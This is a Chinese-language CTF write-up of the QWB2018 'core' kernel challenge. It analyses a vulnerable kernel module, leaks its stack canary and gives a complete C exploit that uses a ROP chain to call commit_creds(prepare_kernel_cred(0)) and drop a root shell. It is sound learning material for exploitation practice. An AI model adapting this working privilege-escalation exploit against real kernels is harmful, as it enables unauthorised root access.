前面做了一道kernel-uaf的題,接著復(fù)現(xiàn)一下kernel-rop的題目
環(huán)境分析
- 首先按照kernel pwn的套路,先解壓core.cpio文件,查看init文件
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko
poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys
poweroff -d 0 -f
- 從腳本中可以看到有我們需要分析的模塊文件是core.ko,然后還有條定時(shí)關(guān)機(jī)的命令(poweroff -d 120 -f &),為了不影響我們調(diào)試,所以把這條命令刪掉再重打包,/tmp目錄下有一個(gè)符號(hào)文件kallsyms,可以leak出內(nèi)核信息,找到commit_creds和prepare_kernel_cred的地址
./gen_cpio.sh core.cpio
- 啟動(dòng)時(shí)候發(fā)現(xiàn)有報(bào)錯(cuò),是因?yàn)榉峙涞膬?nèi)存過小,將start.sh 中-m分配的64M修改為128M即可
Kernel panic - not syncing: Out of memory and no killable processes...
模塊分析
- 首先看開了什么保護(hù)
? give_to_player checksec core.ko
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/core.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x0)
- 然后ida分析,core_copy_func函數(shù)的參數(shù)是signed __int64而qmemcpy的函數(shù)是unsigned __int16,當(dāng)傳入?yún)?shù)a1為負(fù)數(shù)會(huì)產(chǎn)生溢出,將我們的rop鏈拷貝到棧上
signed __int64 __fastcall core_copy_func(signed __int64 a1)
{
signed __int64 result; // rax
__int64 v2; // [rsp+0h] [rbp-50h]
unsigned __int64 v3; // [rsp+40h] [rbp-10h]
v3 = __readgsqword(0x28u);
printk(&unk_215);
if ( a1 > 63 )
{
printk(&unk_2A1);
result = 0xFFFFFFFFLL;
}
else
{
result = 0LL;
qmemcpy(&v2, &name, (unsigned __int16)a1);
}
return result;
}
- core_ioctl函數(shù)可以控制全局變量off,而core_read會(huì)根據(jù)off的偏移來拷貝 64 個(gè)字節(jié)到用戶空間,我們可以控制off來leak canary和一些地址
__int64 __fastcall core_ioctl(__int64 a1, int a2, __int64 a3)
{
signed __int64 v3; // rbx
v3 = a3;
switch ( a2 )
{
case 1719109787:
core_read(a3);
break;
case 1719109788:
printk(&unk_2CD);
off = v3;
break;
case 1719109786:
printk(&unk_2B3);
core_copy_func(v3);
break;
}
return 0LL;
}
unsigned __int64 __fastcall core_read(__int64 a1)
{
__int64 v1; // rbx
__int64 *v2; // rdi
signed __int64 i; // rcx
unsigned __int64 result; // rax
__int64 v5; // [rsp+0h] [rbp-50h]
unsigned __int64 v6; // [rsp+40h] [rbp-10h]
v1 = a1;
v6 = __readgsqword(0x28u);
printk(&unk_25B);
printk(&unk_275);
v2 = &v5;
for ( i = 16LL; i; --i )
{
*(_DWORD *)v2 = 0;
v2 = (__int64 *)((char *)v2 + 4);
}
strcpy((char *)&v5, "Welcome to the QWB CTF challenge.\n");
result = copy_to_user(v1, (char *)&v5 + off, 64LL);
if ( !result )
return __readgsqword(0x28u) ^ v6;
__asm { swapgs }
return result;
}
- core_write讓我們對(duì)name進(jìn)行寫入,通過core_write和core_copy_func函數(shù)實(shí)現(xiàn)寫入rop_chain
signed __int64 __fastcall core_write(__int64 a1, __int64 a2, unsigned __int64 a3)
{
unsigned __int64 v3; // rbx
v3 = a3;
printk(&unk_215);
if ( v3 <= 0x800 && !copy_from_user(&name, a2, v3) )
return (unsigned int)v3;
printk(&unk_230);
return 4294967282LL;
}
利用思路
- 通過 ioctl 設(shè)置 off,然后通過 core_read() leak 出 canary
- 通過 core_write() 向 name 寫,構(gòu)造 ropchain
- 通過 core_copy_func() 從 name 向局部變量上寫,通過設(shè)置合理的長(zhǎng)度和 canary 進(jìn)行 rop
- 通過 rop 執(zhí)行 commit_creds(prepare_kernel_cred(0))
- 返回用戶態(tài),通過 system(“/bin/sh”) 等起 shell
編寫exp
- 編寫exp的時(shí)候還要邊調(diào)試,下圖是調(diào)試尋找泄漏canary的偏移,由圖可知道canary距離rsp的偏移是0x40,返回地址的偏移是0x50
- 接下來是找覆蓋返回地址的偏移,由圖可知返回地址偏移是0x50
- 找gadget的偏移,不能從帶符號(hào)的vmlinux里面找gadget,要從bzImage里面提取之后再找gadget,先用extract-vmlinux提取文件出來,再用ropper找gadegt
? give_to_player ./extract-vmlinux ./bzImage > rop_gadget
? give_to_player ropper --file './rop_gadget' --search "pop rdx; ret"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdx; ret
[INFO] File: ./rop_gadget
0xffffffff81f1023d: pop rdx; ret 0x6fff;
0xffffffff817f8da2: pop rdx; ret 0xa0;
0xffffffff817023a4: pop rdx; ret 0xebff;
0xffffffff810a0f49: pop rdx; ret;
? give_to_player bpython
bpython version 0.17.1 on top of Python 2.7.12 /usr/bin/python
>>> from pwn import *
>>> vmlinux = ELF("./rop_gadget")
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/rop_ga
dget'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0xffffffff81000000)
RWX: Has RWX segments
>>> pop_rdx_ret_offset = hex(0xffffffff810a0f49 - 0xffffffff81000000)
>>> pop_rdx_ret_offset
'0xa0f49'
- 寫exp,這里直接套用charlie師傅的exp
//gcc exp.c -o exp -static -masm=intel
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <string.h>
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}
void binsh()
{
system("/bin/sh");
}
int main()
{
save_status();
void* commit_creds;
void* base_addr;
void* prepare_kernel_cred;
FILE* base=popen("grep startup_64 /tmp/kallsyms |awk -F' ' '{print $1}'","r");
fscanf(base,"%p",&base_addr);
commit_creds=base_addr+0x9c8e0;
prepare_kernel_cred=base_addr+0x9cce0;
printf("commit_creds is %p \nbase is %p \nprepare is %p\n",commit_creds,base_addr,prepare_kernel_cred);
fclose(base);
int fd = open("/proc/core",O_WRONLY);
if(fd<0)
{
printf("open core failed\n");
exit(-1);
}
ioctl(fd,0x6677889C,0x40); //set offset
long long canary[0x10];
ioctl(fd,0x6677889B,canary); //get canary
printf("ret addr is %lx\n",canary[2]);
long long payload[0x40];
payload[8]=canary[0]; //canary
payload[9]=canary[1]; //rbp
void* mov_rdi_rax_jmp_rdx=base_addr+0x6a6d2;
void* prdx=base_addr+0xa0f49;
void* prdi=base_addr+0xb2f;
void* swapgs=base_addr+0xa012da;
void* iretq=base_addr+0x50ac2;
int i=10;
payload[i++]=prdi; //pop rdi;
payload[i++]=0;
payload[i++]=prepare_kernel_cred; //prepare_kernel_cred(0);
payload[i++]=prdx; //pop rdx;
payload[i++]=commit_creds; //commit_creds(prepare_kernel_cred(0));
payload[i++]=mov_rdi_rax_jmp_rdx; //mov rdi, rax; call rdx;
payload[i++]=swapgs; //swapgs; popfq; ret
payload[i++]=0;
payload[i++]=iretq; //iretq; ret;
payload[i++]=(size_t)binsh;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_sp;
payload[i++] = user_ss;
write(fd,payload,0x200);
long long v=0xffffffffffff0000 | (0x100);
ioctl(fd,0x6677889A,v);
return 0;
}
- 編譯exp,然后重打包fs,啟動(dòng)系統(tǒng),運(yùn)行exp
? give_to_player gcc exp.c -o exp -static -masm=intel
? give_to_player cd core
? core ./gen_cpio.sh core.cpio
? core cp ./core.cpio ../
? core cd ..
? give_to_player ./start.sh
/ $ ./exp
[*]status has been saved.
commit_creds is 0xffffffffbd29c8e0
base is 0xffffffffbd200000
prepare is 0xffffffffbd29cce0
ret addr is ffffffffc039119b
/ # id
uid=0(root) gid=0(root)
/ #
參考文章:
